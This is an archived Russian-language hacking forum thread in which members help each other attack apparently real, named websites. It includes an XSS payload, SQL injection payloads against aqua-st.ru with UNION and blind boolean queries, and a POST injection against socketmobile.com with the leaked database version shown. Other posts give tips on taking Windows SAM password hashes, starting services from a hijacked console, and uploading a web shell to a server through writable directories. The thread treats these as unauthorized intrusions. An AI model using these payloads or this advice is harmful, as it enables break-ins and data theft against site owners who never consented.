Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. boobl

    boobl New Member

    Joined:
    20 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    код закрыт. там в инпут идёт код:
    ?FPriceMin="><script>alert();</script><img%20src="

    когда весь код сохраняют себе и запускаю как html - alert работает. на сайте нет, может быть защита обработки GET запросов? потому как:
    "><BGSOUND%20SRC="javascript:alert();"><img%20src="
    через обычный просмотр кода - <BGSOUND SRC="javascript:alert();">
    через Developer Tools - <bgsound src="javascript:void(0)"></bgsound>
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    а рой дальше в сторону того как, какой браузер как инфу отображает.
     
    _________________________
  3. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    520
    Likes Received:
    105
    Reputations:
    53
    Читай маны по скулям. Нет тут ничего.
     
  4. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    228
    Likes Received:
    26
    Reputations:
    6
    http://aqua-st.ru/catalog/102
    Помогите! Обычные трюки не проходят!
     
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Обычное внедрение SQL-кода в запрос:
    Code:
    SELECT * FROM products WHERE category_id in (SQL) and hidden=0 ...
    Можно просто сделать так:
    Code:
    1) and 1=2 UNION SELECT ...#
    Советую обратиться к документации MySQL.
     
  6. FlaktW

    FlaktW Member

    Joined:
    19 Aug 2009
    Messages:
    483
    Likes Received:
    33
    Reputations:
    12
    Что-то не получается вывести так версию БД
    Покажи запрос полностью.
    http://aqua-st.ru/catalog/102%20order%20by%201#
     
    #17726 FlaktW, 22 Aug 2011
    Last edited: 22 Aug 2011
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,671
    Likes Received:
    1,268
    Reputations:
    1,557
    http://*******.ru/catalog/102)and(0)=(1)union(select(1),2,3)#
    Если твой браузер не отправляет в запросах символ '#', используй сниферы с возможностью изменения запросов на лету (в Charles - Ctrl+Shift+W, Rules, Type=Path, Match=^(.*)$, Replace=$1#)
    Число столбцов подбирать придется вручную. Возможно, я ошибаюсь, но их не менее 999 ;)

    upd:
    Все-таки ошибся.
    При правильном количестве столбцов ошибки в запросе
    больше нет. Но она есть во втором запросе
    Как видно из второго запроса, он вызовет ту же ошибку, поэтому софт пропустил правильное количество при прямом переборе.
    Использовать union не получится. Только как слепую крутить.

    Столбцов, как оказалось, 27.
    102)and(1)=if(((select(count(*))from(information_schema.columns)where(table_name=0x70726F6475637473)and(table_schema=database()))>26),1,0)#
    true

    102)and(1)=if(((select(count(*))from(information_schema.columns)where(table_name=0x70726F6475637473)and(table_schema=database()))>27),1,0)#
    false
     
    #17727 M_script, 22 Aug 2011
    Last edited: 23 Aug 2011
    1 person likes this.
  8. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    # - %23
    % - %25
    Это надо запомнить, и не мучиться с Charles(В большинстве случаев).
     
  9. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,671
    Likes Received:
    1,268
    Reputations:
    1,557
    Че правда так можно? Не обманываешь? :eek:
    Ты пример посмотри. Там не в параметрах инъекция.
     
  10. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    262
    Likes Received:
    24
    Reputations:
    8
    Пароли от учетных записей в нынешних операционных системах не хранятся. Найти можно только hash пароля. Если тебе нужен hash пароля учетной записи то он в windows хранится в SAM файле. Тебе в system32.
     
  11. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    171
    Likes Received:
    1
    Reputations:
    -10
    я второго юзера через батник сделал, но всёравно спасибо)
     
  12. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    171
    Likes Received:
    1
    Reputations:
    -10
    можно какнибудь запустить службу удаленного управления компьютером через встроеную в всо консоль?
     
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,119
    Likes Received:
    601
    Reputations:
    684
    ну если у тебя получилось запустить батник, почему бы и не запускать службы ?
    net start "имя службы"
     
    _________________________
  14. Ulitko

    Ulitko New Member

    Joined:
    12 Aug 2011
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    искал, гуглил, но не нашел мануала как рутать винду оО. Консолька в всо не канает. Мб кто подкинет мануальчик?
     
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Не рутать, а получить права админа. Для этого есть эксплоиты, для начала посмотри это видео: https://forum.antichat.net/showpost.php?p=2770920&postcount=1
     
  16. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    487
    Likes Received:
    63
    Reputations:
    26
    Народ) собсно такой вопрос...
    Вообщем есть скуль с правами Y, но нет папки на запись... инклуда тоже нет = \
    Вообщем то нарыл доступ по ssh к этому серверу.....
    но права у юзера уг
    у моего юзера например директория /home/myuser а сайт лежит в дириктории /home/siteuser/
    Можно ли как то залить шелл в корень сайта?)
    Порутать сервак не получится = \ т.к.
    Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
    Есть какие нибудь варианты как залить шелл ?))
     
  17. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    59
    Likes Received:
    1
    Reputations:
    0
    Почему обязательно в корень сайта? Можно залить и скажем в images и другие подобные директории открытые на запись.. А потом, если необходимо, переместить шелл в корень...
    Через SSH просмотри в /home/siteuser/ любую открытую на запись директорию, и лей, лей..
     
    1 person likes this.
  18. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    94
    Likes Received:
    7
    Reputations:
    1
    здравствуйте, нашел интересную иньекцию, судя по всему mssql.Если в данной форме
    ввести кавычку, вылетает ошибка.Как такое можно раскрутить?
     
  19. RexTiam

    RexTiam Member

    Joined:
    2 Nov 2009
    Messages:
    313
    Likes Received:
    49
    Reputations:
    5
    KUKLOVOD2, там не только эта бага)
    но ссылку твою не получилось раскрутить
     
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    POST http://www.socketmobile.com/support/wifi/pw.asp
    POSTDATA(вариант 1): Email=1')+UNION+SELECT+1,2,@@version,4--+&submit=Send+Registration+Key
    POSTDATA(вариант 2):
    Email=asd')[email protected]@version--+&submit=Send+Registration+Key


    Result:
    Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
     
    #17740 Tigger, 25 Aug 2011
    Last edited: 25 Aug 2011
    6 people like this.
Loading...
Thread Status:
Not open for further replies.